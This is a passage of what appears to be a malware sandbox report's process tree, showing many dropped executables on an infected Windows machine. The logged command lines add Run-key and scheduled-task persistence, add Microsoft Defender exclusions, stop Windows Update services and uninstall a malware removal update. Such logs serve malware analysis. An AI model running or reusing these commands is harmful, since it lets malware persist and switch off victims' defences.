C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
PID:36636
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:40232
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:37704
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:39720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Adds Run key to start application
PID:2880 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
PID:3236
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:40656
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Suspicious use of SetWindowsHookEx
PID:3036
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Drops file in Windows directory
PID:17828 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵
- Adds Run key to start application
PID:16844 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵PID:43676
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Drops file in Windows directory
PID:42564 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵
- Adds Run key to start application
PID:42396 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Suspicious use of SetWindowsHookEx
PID:42128
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:14712 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:15356
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV113⤵
- Suspicious use of SetWindowsHookEx
PID:15912
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:10408
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:10492
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:40216
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:9328
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:9512
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:8496
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:19396
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:18316
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:12196
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:40276
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:13536
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:14156
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:12808
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:11644
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:11120
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:10968
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:9204
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:9468
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:7000
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:2032
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:7468
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:3984
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:1916
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:9716
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:20744
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:21160
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:22108
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:21700
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:22264
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:20780
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:19568
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:7236
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:25228
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:24684
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:22472
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:22096
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:11176
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:26772
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:27524
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:27592
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:29344
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:28560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 28560 -s 7613⤵
- Program crash
PID:19016
-
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:22872
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:23388
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:30500
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:30380
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:31348
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:31152
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:30812
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:31288
-
-
-
C:\Windows\svchost.com"C:\Windows\svchost.com" "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v "KeybordDriver" /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f11⤵PID:32576
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v KeybordDriver /t REG_SZ /d "\"C:\Users\Admin\AppData\Roaming\Windows Objects\wmimic.exe\" winstart" /f12⤵PID:31936
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 3 /nobreak5⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:7988
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\MK.exe"C:\Users\Admin\AppData\Local\Temp\Files\MK.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:24004 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3428
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵PID:29056
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Modifies system certificate store
PID:29232
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\XM.exe"C:\Users\Admin\AppData\Local\Temp\Files\XM.exe"3⤵
- Executes dropped EXE
PID:24288
-
-
C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tu%D1%80111.exe"C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tu%D1%80111.exe"3⤵
- Executes dropped EXE
- Checks processor information in registry
PID:28224 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 28224 -s 19564⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:33024
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"3⤵PID:29384
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f4⤵
- Scheduled Task/Job: Scheduled Task
PID:18176
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:28708 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows System" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:29004
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\GlitchClipper.exe"C:\Users\Admin\AppData\Local\Temp\Files\GlitchClipper.exe"3⤵
- Checks computer location settings
- Adds Run key to start application
PID:32536
-
-
C:\Users\Admin\AppData\Local\Temp\Files\out_test_sig.exe"C:\Users\Admin\AppData\Local\Temp\Files\out_test_sig.exe"3⤵PID:32812
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Microsoft\Windows\hyper-v.exe"4⤵
- Command and Scripting Interpreter: PowerShell
PID:35584
-
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:35320
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Utility3.exe"C:\Users\Admin\AppData\Local\Temp\Files\Utility3.exe"3⤵PID:32856
-
-
C:\Users\Admin\AppData\Local\Temp\Files\channel.exe"C:\Users\Admin\AppData\Local\Temp\Files\channel.exe"3⤵
- Checks processor information in registry
PID:33420 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 33420 -s 20324⤵
- Program crash
PID:17200
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"C:\Users\Admin\AppData\Local\Temp\Files\ew.exe"3⤵PID:37572
-
-
C:\Users\Admin\AppData\Local\Temp\Files\a.exe"C:\Users\Admin\AppData\Local\Temp\Files\a.exe"3⤵
- Adds Run key to start application
- Drops file in Windows directory
PID:37680 -
C:\Users\Admin\sysvplervcs.exeC:\Users\Admin\sysvplervcs.exe4⤵
- Modifies security service
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Suspicious behavior: SetClipboardViewer
PID:37816 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"5⤵
- System Location Discovery: System Language Discovery
PID:38004 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"6⤵
- Command and Scripting Interpreter: PowerShell
PID:38116
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait5⤵PID:38020
-
C:\Windows\SysWOW64\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
PID:38096
-
-
C:\Windows\SysWOW64\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:38136
-
-
C:\Windows\SysWOW64\sc.exesc stop wuauserv6⤵
- Launches sc.exe
PID:38164
-
-
C:\Windows\SysWOW64\sc.exesc stop DoSvc6⤵
- Launches sc.exe
PID:38180
-
-
C:\Windows\SysWOW64\sc.exesc stop BITS /wait6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:38272
-
-
-
C:\Users\Admin\AppData\Local\Temp\301428338.exeC:\Users\Admin\AppData\Local\Temp\301428338.exe5⤵
- Checks computer location settings
PID:9264 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f6⤵PID:8896
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:8844
-
-
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f7⤵PID:8688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"6⤵PID:8264
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:8216
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /f /tn "Windows Upgrade Manager"7⤵PID:19396
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1473532575.exeC:\Users\Admin\AppData\Local\Temp\1473532575.exe5⤵
- System Location Discovery: System Language Discovery
PID:12640
-
-
C:\Users\Admin\AppData\Local\Temp\2670024760.exeC:\Users\Admin\AppData\Local\Temp\2670024760.exe5⤵PID:17004
-
-
C:\Users\Admin\AppData\Local\Temp\1419916379.exeC:\Users\Admin\AppData\Local\Temp\1419916379.exe5⤵PID:24720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\djksahjkdhkh.exe"C:\Users\Admin\AppData\Local\Temp\Files\djksahjkdhkh.exe"3⤵PID:38300
-
-
C:\Users\Admin\AppData\Local\Temp\Files\service.exe"C:\Users\Admin\AppData\Local\Temp\Files\service.exe"3⤵PID:38384
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 38384 -s 11164⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:32028
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Indentif.exe"C:\Users\Admin\AppData\Local\Temp\Files\Indentif.exe"3⤵PID:38680
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe"C:\Users\Admin\AppData\Local\Temp\Files\Armanivenntii_crypted_EASY.exe"3⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:38768 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"4⤵PID:17520
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"C:\Users\Admin\AppData\Local\Temp\Files\inst77player_1.0.0.1.exe"3⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:38972
-
-
C:\Users\Admin\AppData\Local\Temp\Files\h5a71wdy.exe"C:\Users\Admin\AppData\Local\Temp\Files\h5a71wdy.exe"3⤵
- Suspicious use of SetThreadContext
PID:40068 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
PID:40208
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:40564
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:5328
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:40584
-
-
